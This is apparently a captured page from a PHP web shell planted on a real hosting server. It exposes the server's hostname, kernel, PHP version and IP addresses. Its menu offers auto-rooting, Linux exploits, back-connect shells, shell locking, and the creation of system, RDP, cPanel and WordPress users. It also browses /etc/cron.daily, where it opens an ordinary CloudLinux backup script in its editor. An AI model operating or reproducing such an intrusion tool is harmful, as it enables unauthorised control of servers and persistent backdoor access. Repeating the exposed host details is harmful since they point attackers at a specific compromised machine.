Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
cloudlinux-backup-utils
801
B
-rwxr-xr-x
csget
3.24
KB
-rwx------
imunify-antivirus.cron
1.71
KB
-rwxr-xr-x
imunify-realtime-av-fchange-up...
244
B
-rwxr-xr-x
imunify360.cron
1.72
KB
-rwxr-xr-x
logrotate
258
B
-rwx------
maldet
3.71
KB
-rwxr-xr-x
man-db.cron
618
B
-rwxr-xr-x
ossec_logs_cleaner
427
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cloudlinux-backup-utils
#!/bin/bash LOG_FILE=${1:-/var/log/cloudlinux-backup-utils-cron.log} log() { echo "$(date -u): ${*}" >>"${LOG_FILE}" } refresh_token_if_present() { backend=${1} token_file=/var/restore_infected/${backend}_api_token.json if [ -f "${token_file}" ]; then log "${backend}: refreshing auth token" out=$(/usr/bin/restore_infected "${backend}" extra refresh_token 2>&1) exit_code=$? if [ "${exit_code}" != "0" ]; then log "${out}" log "Token refresh failed" echo "${out}" echo "Token refresh failed" return 1 fi log "Auth token refreshed" else log "${backend}: not initialized, skipping..." fi } refresh_token_if_present acronis refresh_token_if_present r1soft
Close